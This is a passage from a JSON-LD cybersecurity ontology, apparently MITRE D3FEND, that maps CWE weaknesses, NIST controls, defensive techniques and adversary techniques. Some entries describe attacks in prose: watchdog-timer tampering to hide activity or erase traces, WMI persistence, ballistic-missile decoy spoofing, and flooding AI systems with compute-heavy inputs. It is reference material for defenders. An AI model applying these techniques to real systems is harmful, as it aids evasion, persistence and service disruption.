      "d3f:definition": "An event capturing the deactivation of a service application, preventing it from being started or accessed until re-enabled.",
      "rdfs:label": "Service Disable Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationDisableEvent"
        },
        {
          "@id": "d3f:ServiceEvent"
        },
        {
          "@id": "_:Nf6b800355281426b9b0df285f0d1e871"
        }
      ]
    },
    {
      "@id": "_:Nf6b800355281426b9b0df285f0d1e871",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceEnableEvent"
      }
    },
    {
      "@id": "d3f:DE-0003.11",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0003.11",
      "d3f:definition": "By modifying watchdog parameters or who “pets” them, an adversary shapes what evidence survives. Extending or disabling timeouts allows long-running processes to operate without forced resets that would expose abnormal CPU or power usage; conversely, shortening windows or relocating the petting source to a low-level ISR can induce frequent resets that wipe volatile traces, break correlation in logs, and explain anomalies as “spurious reboots.” In both directions, the watchdog becomes a timing tool for hiding activity rather than a guardrail against it.",
      "d3f:modifies": {
        "@id": "d3f:WatchdogTimer"
      },
      "rdfs:label": "Watchdog Timer (WDT) for Evasion - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0003/11/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DE-0003"
        },
        {
          "@id": "_:N57ba7af847834c62b2d7ca96b10cf8a7"
        }
      ],
      "skos:prefLabel": "Watchdog Timer (WDT) for Evasion"
    },
    {
      "@id": "_:N57ba7af847834c62b2d7ca96b10cf8a7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WatchdogTimer"
      }
    },
    {
      "@id": "d3f:ATLASCommandAndControlTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0014"
      },
      "rdfs:label": "Command and Control Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:Nda3077c3051241abb60107029b5c3a86"
        }
      ],
      "skos:prefLabel": "Command and Control Technique"
    },
    {
      "@id": "_:Nda3077c3051241abb60107029b5c3a86",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0014"
      }
    },
    {
      "@id": "d3f:CWE-820",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-820",
      "d3f:definition": "The product utilizes a shared resource in a concurrent manner but does not attempt to synchronize access to the resource.",
      "rdfs:label": "Missing Synchronization",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-662"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_20",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Approved Solutions",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(20)"
    },
    {
      "@id": "d3f:CWE-470",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-470",
      "d3f:definition": "The product uses external input with reflection to select which classes or code to use, but it does not sufficiently prevent the input from selecting improper classes or code.",
      "d3f:synonym": "Reflection Injection",
      "rdfs:label": "Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-610"
        },
        {
          "@id": "d3f:CWE-913"
        }
      ]
    },
    {
      "@id": "d3f:GetRunningProcesses",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enumerates": {
        "@id": "d3f:Process"
      },
      "rdfs:label": "Get Running Processes",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:Nd6b11d8c099e4cbe99f8f1a10771b19a"
        }
      ]
    },
    {
      "@id": "_:Nd6b11d8c099e4cbe99f8f1a10771b19a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enumerates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:PythonPackage",
      "@type": "owl:Class",
      "d3f:definition": "A Python package is an aggregation of many Python files - either in source code or in bytecode - and associated metadata and resources (text, images, etc.). Python packages can be distributed in different file formats.",
      "rdfs:label": "Python Package",
      "rdfs:seeAlso": {
        "@id": "https://packaging.python.org/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SoftwarePackage"
      }
    },
    {
      "@id": "d3f:T0811",
      "@type": "owl:Class",
      "d3f:attack-id": "T0811",
      "d3f:definition": "Adversaries may target and collect data from information repositories. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes. Examples of information repositories include reference databases in the process environment, as well as databases in the corporate network that might contain information about the ICS.(Citation: Cybersecurity & Infrastructure Security Agency March 2018)",
      "rdfs:label": "Data from Information Repositories - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCollectionTechnique"
      },
      "skos:prefLabel": "Data from Information Repositories"
    },
    {
      "@id": "d3f:AdministrativeNetworkActivityAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:AdministrativeNetworkActivityAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      },
      "d3f:created": {
        "@type": "xsd:dateTime",
        "@value": "2020-08-05T00:00:00"
      },
      "d3f:d3fend-id": "D3-ANAA",
      "d3f:definition": "Detection of unauthorized use of administrative network protocols by analyzing network activity against a baseline.",
      "d3f:kb-article": "## How it works\nNetwork protocols such as RDP, IPMI, SSH, SNMP, VNC, MOSH, NX, TeamViewer, SPICE, PCoIP, and others are used by system administrators to remotely manage servers. Defenders monitor administrative network activity to determine if the use of remote protocols is malicious. Attackers can abuse administrative protocols and leverage them for initial access to various endpoints. For example, an attacker with valid credentials will remotely SSH or RDP into a server and attempt to blend in with existing traffic from system administrators. By monitoring the traffic activity, it is possible to detect when the protocols are behaving differently from a known baseline of system administration activity.\n\n## Considerations\n* Administrative traffic can be encrypted, making network protocol analysis a challenge\n* False alarms can be mitigated by integration with inventory management systems",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-MethodAndSystemForDetectingSuspiciousAdministrativeActivity_VectraNetworksInc"
        },
        {
          "@id": "d3f:Reference-RemoteRegistry_MITRE"
        },
        {
          "@id": "d3f:Reference-WindowsRemoteManagement_WinRM_MITRE"
        }
      ],
      "rdfs:label": "Administrative Network Activity Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:N9bf25e8673134ad0a8e653524c59fd73"
        }
      ]
    },
    {
      "@id": "_:N9bf25e8673134ad0a8e653524c59fd73",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      }
    },
    {
      "@id": "d3f:SecurityEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event describing occurrences related to cybersecurity, including detection, remediation, or enforcement actions. Security events provide critical insights into the state, behavior, and resilience of digital systems.",
      "rdfs:label": "Security Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:N117c0e5062eb4d04b93619eee064f236"
        }
      ]
    },
    {
      "@id": "_:N117c0e5062eb4d04b93619eee064f236",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:caused-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DefensiveAction"
      }
    },
    {
      "@id": "d3f:T1087.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1087.001",
      "d3f:definition": "Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.",
      "d3f:enumerates": {
        "@id": "d3f:LocalUserAccount"
      },
      "rdfs:label": "Local Account",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1087"
        },
        {
          "@id": "_:N483e7ac644cc4442a6b76251240cedd2"
        }
      ]
    },
    {
      "@id": "_:N483e7ac644cc4442a6b76251240cedd2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enumerates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalUserAccount"
      }
    },
    {
      "@id": "d3f:CWE-491",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-491",
      "d3f:definition": "A class has a cloneable() method that is not declared final, which allows an object to be created without calling the constructor. This can cause the object to be in an unexpected state.",
      "rdfs:label": "Public cloneable() Method Without Final ('Object Hijack')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:CWE-146",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-146",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as expression or command delimiters when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Expression/Command Delimiters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-140"
      }
    },
    {
      "@id": "d3f:ArtifactServer",
      "@type": "owl:Class",
      "d3f:definition": "A digital artifact server provides access services to digital artifacts in a repository.  It provides an associated set of data management, search and access methods allowing application-independent access to the content.",
      "rdfs:label": "Artifact Server",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Content_management"
        },
        {
          "@id": "dbr:Content_repository"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:WebServer"
      }
    },
    {
      "@id": "d3f:CWE-7",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-7",
      "d3f:definition": "The default error page of a web application should not display sensitive information about the product.",
      "rdfs:label": "J2EE Misconfiguration: Missing Custom Error Page",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-756"
      }
    },
    {
      "@id": "d3f:CWE-219",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-219",
      "d3f:definition": "The product stores sensitive data under the web document root with insufficient access control, which might make it accessible to untrusted parties.",
      "rdfs:label": "Storage of File with Sensitive Data Under Web Root",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-552"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SA-10_5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Developer Configuration Management | Mapping Integrity for Version Control",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": [
        {
          "@id": "d3f:FirmwareVerification"
        },
        {
          "@id": "d3f:PlatformHardening"
        }
      ],
      "rdfs:label": "SA-10(5)"
    },
    {
      "@id": "d3f:ATTACKMobileCollectionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0035"
      },
      "rdfs:label": "Collection Technique - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTechnique"
        },
        {
          "@id": "_:N4acc26f11f0d468dbf8af1113963d64b"
        }
      ],
      "skos:prefLabel": "Collection Technique"
    },
    {
      "@id": "_:N4acc26f11f0d468dbf8af1113963d64b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0035"
      }
    },
    {
      "@id": "d3f:DeepNeuralNetClassification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DNNC",
      "d3f:definition": "A deep neural network (DNN) is an artificial neural network (ANN) with multiple layers between the input and output layers. There are different types of neural networks but they always consist of the same components: neurons, synapses, weights, biases, and functions. These components as a whole function similarly to a human brain, and can be trained like any other ML algorithm",
      "d3f:kb-article": "## References\nDeep learning. Wikipedia. [Link](https://en.wikipedia.org/wiki/Deep_learning).",
      "rdfs:label": "Deep Neural Network Classification",
      "rdfs:subClassOf": {
        "@id": "d3f:ArtificialNeuralNetClassification"
      }
    },
    {
      "@id": "d3f:ProcessCreationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a new process is spawned, initializing its execution context and resource allocation.",
      "rdfs:label": "Process Creation Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessEvent"
        },
        {
          "@id": "_:N0c35fd51c842499a90ab22abb0d4897e"
        }
      ]
    },
    {
      "@id": "_:N0c35fd51c842499a90ab22abb0d4897e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessStartFunction"
      }
    },
    {
      "@id": "d3f:CCI-002281_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system maintains the association of organization-defined security attributes to organization-defined subjects.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002281"
    },
    {
      "@id": "d3f:ATLASReconnaissanceTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0002"
      },
      "rdfs:label": "Reconnaissance Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:N0cc2433ea21249fcb236eb9547bcd0ff"
        }
      ],
      "skos:prefLabel": "Reconnaissance Technique"
    },
    {
      "@id": "_:N0cc2433ea21249fcb236eb9547bcd0ff",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0002"
      }
    },
    {
      "@id": "d3f:ActiveLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-AL",
      "d3f:definition": "Active learning aims to improve learning efficiency by allowing the learning algorithm to select which data to learn from.",
      "d3f:kb-article": "## How it works\nTraditional supervised learning often requires a large number of labeled instances, which can be costly or time-consuming to obtain. Active learning addresses this labeling bottleneck by asking an oracle (e.g., a human annotator) to label selected unlabeled instances. The goal is to achieve high accuracy with minimal labeling effort.\n\n## Considerations\nActive learning is particularly useful in scenarios where data is abundant but labeled instances are scarce or expensive. Examples include speech recognition, information extraction, and document classification.\n\n## References\n- Wikipedia article on Active Learning (machine learning) [Link](https://en.wikipedia.org/wiki/Active_learning_(machine_learning))\n- Settles, B. (2009). Active Learning Literature Survey. [Link](https://burrsettles.com/pub/settles.activelearning.pdf)",
      "rdfs:label": "Active Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:MachineLearning"
      }
    },
    {
      "@id": "d3f:OTModifyDeviceConfigurationCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Modify device configuration.",
      "rdfs:comment": [
        "BACnet: deviceCommunicationControl\nBACnet: reinitializeDevice ",
        "GE-SRTP: WRITE PROGRAM BLOCK MEMORY\nGE-SRTP: CHANGE PLC CPU PRIVILEGE LEVEL\nGE-SRTP: SET CONTROL ID(CPU ID)\nGE-SRTP: SET PLC (RUN VS STOP)\nGE-SRTP: PROGRAM STORE (UPLOAD FROM PLC)\nGE-SRTP: PROGRAM LOAD (DOWNLOAD TO PLC)\nGE-SRTP: TOGGLE FORCE SYSTEM MEMORY"
      ],
      "rdfs:label": "OT Modify Device Configuration Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTDeviceConfigurationCommand"
      }
    },
    {
      "@id": "d3f:T0887",
      "@type": "owl:Class",
      "d3f:attack-id": "T0887",
      "d3f:definition": "Adversaries may seek to capture radio frequency (RF) communication used for remote control and reporting in distributed environments. RF communication frequencies vary between 3 kHz to 300 GHz, although are commonly between 300 MHz to 6 GHz. (Citation: Candell, R., Hany, M., Lee, K. B., Liu,Y., Quimby, J., Remley, K. April 2018)  The wavelength and frequency of the signal affect how the signal propagates through open air, obstacles (e.g. walls and trees) and the type of radio required to capture them. These characteristics are often standardized in the protocol and hardware and may have an effect on how the signal is captured. Some examples of wireless protocols that may be found in cyber-physical environments are: WirelessHART, Zigbee, WIA-FA, and 700 MHz Public Safety Spectrum.",
      "rdfs:label": "Wireless Sniffing - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSCollectionTechnique"
        },
        {
          "@id": "d3f:ATTACKICSDiscoveryTechnique"
        }
      ],
      "skos:prefLabel": "Wireless Sniffing"
    },
    {
      "@id": "d3f:CWE-584",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-584",
      "d3f:definition": "The code has a return statement inside a finally block, which will cause any thrown exception in the try block to be discarded.",
      "rdfs:label": "Return Inside Finally Block",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-705"
      }
    },
    {
      "@id": "d3f:LinuxDeleteModule",
      "@type": "owl:Class",
      "d3f:definition": "Attempts to remove the unused loadable module entry identified by name. If the module has an exit function, then that function is executed before unloading the module.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/delete_module.2.html"
      },
      "rdfs:label": "Linux Delete Module",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIUnloadModule"
      }
    },
    {
      "@id": "d3f:CCI-002262_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization provides the means to associate organization-defined types of security attributes having organization-defined security attribute values with information in storage.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002262"
    },
    {
      "@id": "d3f:StringEquivalenceMatching",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SEM",
      "d3f:definition": "String equivalence matching is a type of string pattern matching which is exact; that is, the strings being compared must have the same value for each character in their sequence and be of the same length.",
      "d3f:kb-article": "## References\n1. String-searching algorithm. (2023, April 8). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/String-searching_algorithm)\n2. Types of Equality. (2007, March 2). In _WikiWikiWeb_. [Link](https://wiki.c2.com/?TypesOfEquality)",
      "rdfs:label": "String Equivalence Matching",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EquivalenceMatching"
        },
        {
          "@id": "d3f:StringPatternMatching"
        }
      ]
    },
    {
      "@id": "d3f:WatchdogTimerExpirationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event indicating the watchdog timer was not serviced in time and triggers a reset or escalation action.",
      "rdfs:label": "Watchdog Timer Expiration Event",
      "rdfs:subClassOf": {
        "@id": "d3f:WatchdogTimerEvent"
      }
    },
    {
      "@id": "d3f:d3fend-kb-data-property",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x d3fend-kb-data-property y: The d3fend knowledge base object x has a data property y; e.g., a string capturing a particular aspect or section of a knowledge base article.",
      "rdfs:label": "d3fend-kb-data-property",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-data-property"
      }
    },
    {
      "@id": "d3f:CWE-223",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-223",
      "d3f:definition": "The product does not record or display information that would be important for identifying the source or nature of an attack, or determining if an action is safe.",
      "rdfs:label": "Omission of Security-relevant Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-221"
      }
    },
    {
      "@id": "d3f:FileMetadata",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Information that describes and provides context about a file's content, structure, and attributes.",
      "rdfs:label": "File Metadata",
      "rdfs:subClassOf": {
        "@id": "d3f:Metadata"
      }
    },
    {
      "@id": "d3f:AML.T0029",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0029",
      "d3f:definition": "Adversaries may target AI-enabled systems with a flood of requests for the purpose of degrading or shutting down the service.\nSince many AI systems require significant amounts of specialized compute, they are often expensive bottlenecks that can become overloaded.\nAdversaries can intentionally craft inputs that require heavy amounts of useless compute from the AI system.",
      "rdfs:label": "Denial of AI Service - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0029"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASImpactTechnique"
      },
      "skos:prefLabel": "Denial of AI Service"
    },
    {
      "@id": "d3f:ApplicationProtocolCommandAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ApplicationProtocolCommandAnalysis"
      ],
      "d3f:d3fend-id": "D3-APCA",
      "d3f:definition": "Analyzing application protocol level remote commands to detect unauthorized activity.",
      "d3f:kb-article": "## How it works\nThis technique requires the ability to parse application layer protocols to understand the commands being sent to a remote service. Signature-based or statistical analysis may be employed to identify unauthorized commands being sent. These commands can be observed by monitoring network traffic or application logs.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-MethodAndApparatusForDetectingAnomaliesOfAnInfrastructureInANetwork"
        },
        {
          "@id": "d3f:Reference-ProtocolBasedDetectionOfSuspiciousNetworkTraffic"
        }
      ],
      "d3f:monitors": {
        "@id": "d3f:NetworkTraffic"
      },
      "rdfs:label": "Application Protocol Command Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:N2642975e82fd445e90d771ef48e3b15b"
        }
      ]
    },
    {
      "@id": "_:N2642975e82fd445e90d771ef48e3b15b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:EX-0014.05",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0014.05",
      "d3f:definition": "In this variant, attackers deploy decoys or emitters designed to mimic ballistic-missile signatures so early-warning and missile-defense systems allocate interceptors and attention to false targets. Decoys can shape radar cross-section and thermal profiles, stage deployment to simulate staging events, or use cooling/heating to emulate plume and body signatures, while coordinated timing and trajectories reinforce plausibility. The objective is resource depletion and distraction: saturate tracking, cueing, and discrimination so defenses are preoccupied prior to an actual strike or are left with reduced capacity afterward. Although the immediate target is the defense architecture, space-based sensors and their ground processing are integral to the effect; spoofed scenes enter the normal detection and tracking pipelines and propagate as authoritative truth until later discrimination overturns them.",
      "rdfs:label": "Ballistic Missile Spoof - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0014/05/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0014"
      },
      "skos:prefLabel": "Ballistic Missile Spoof"
    },
    {
      "@id": "d3f:CWE-1295",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1295",
      "d3f:definition": "The product fails to adequately prevent the revealing of unnecessary and potentially sensitive system information within debugging messages.",
      "rdfs:label": "Debug Messages Revealing Unnecessary Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-200"
      }
    },
    {
      "@id": "d3f:T1546.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.003",
      "d3f:definition": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user login, or the computer's uptime.(Citation: Mandiant M-Trends 2015)",
      "d3f:modifies": {
        "@id": "d3f:EventLog"
      },
      "d3f:produces": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      },
      "rdfs:label": "Windows Management Instrumentation Event Subscription",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:N4b4b34f09d3249d38d982a9ec655e5d3"
        },
        {
          "@id": "_:N7543986d213f4c11a933b365833bec32"
        }
      ]
    },
    {
      "@id": "_:N4b4b34f09d3249d38d982a9ec655e5d3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLog"
      }
    },
    {
      "@id": "_:N7543986d213f4c11a933b365833bec32",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      }
    },
    {
      "@id": "d3f:CCI-001145_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs, at a minimum, FIPS-validated cryptography to protect unclassified information.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:DiskEncryption"
        },
        {
          "@id": "d3f:FileEncryption"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001145"
    },
    {
      "@id": "d3f:SavedInstructionPointer",
      "@type": "owl:Class",
      "d3f:definition": "A saved instruction pointer points to the instruction that generated an exception (trap or fault).",
      "rdfs:label": "Saved Instruction Pointer",
      "rdfs:seeAlso": {
        "@id": "dbr:Exception_handling"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Pointer"
        },
        {
          "@id": "d3f:StackComponent"
        }
      ]
    },
    {
      "@id": "d3f:OTModifyDeviceOperatingModeCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Modifies the running state of an application or program on a device.",
      "rdfs:label": "OT Modify Device Operating Mode Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceConfigurationCommandEvent"
        },
        {
          "@id": "_:N591b09f22bf7495c8415f72ff308b675"
        },
        {
          "@id": "_:N1eed3bc54d0c40d48be63672fa884fe7"
        }
      ]
    },
    {
      "@id": "_:N591b09f22bf7495c8415f72ff308b675",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "_:N1eed3bc54d0c40d48be63672fa884fe7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTModifyDeviceOperatingModeCommand"
      }
    },
    {
      "@id": "d3f:signed-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x signed-by y: The digital artifact x includes a signature generated by the entity y, certifying the authenticity and integrity of x. This relationship indicates that x has undergone a validation process by y, using cryptographic measures to ensure that x is trustworthy and unaltered since the signing by y.",
      "owl:inverseOf": {
        "@id": "d3f:signs"
      },
      "rdfs:label": "signed-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:validated-by"
      }
    },
    {
      "@id": "d3f:CCI-002614_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization installs organization-defined security-relevant firmware updates automatically to organization-defined information system components.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SoftwareUpdate"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002614"
    },
    {
      "@id": "d3f:HMIApplicationProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The instructions within an HMI defined by user programming to interpret visual (and potentially audio) inputs and define visual (and potentially) audio outputs.",
      "rdfs:label": "HMI Application Process",
      "rdfs:subClassOf": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:decodes",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x decodes y: The entity x transforms data y to a different form, usually through decompression.",
      "rdfs:label": "decodes",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:RemoteShellCommand",
      "@type": "owl:Class",
      "d3f:definition": "A remote shell command is a command sent from one computer to another to be executed on the remote computer.  One example of this, is through a command-line interface (CLI) like using Invoke-Command from PowerShell or a command sent through an ssh session. This class generalizes to all means of sending a command through an established protocol to control capabilities on a remote computer.",
      "rdfs:label": "Remote Shell Command",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/resource/Remote_Shell"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RemoteCommand"
      }
    },
    {
      "@id": "d3f:CWE-38",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-38",
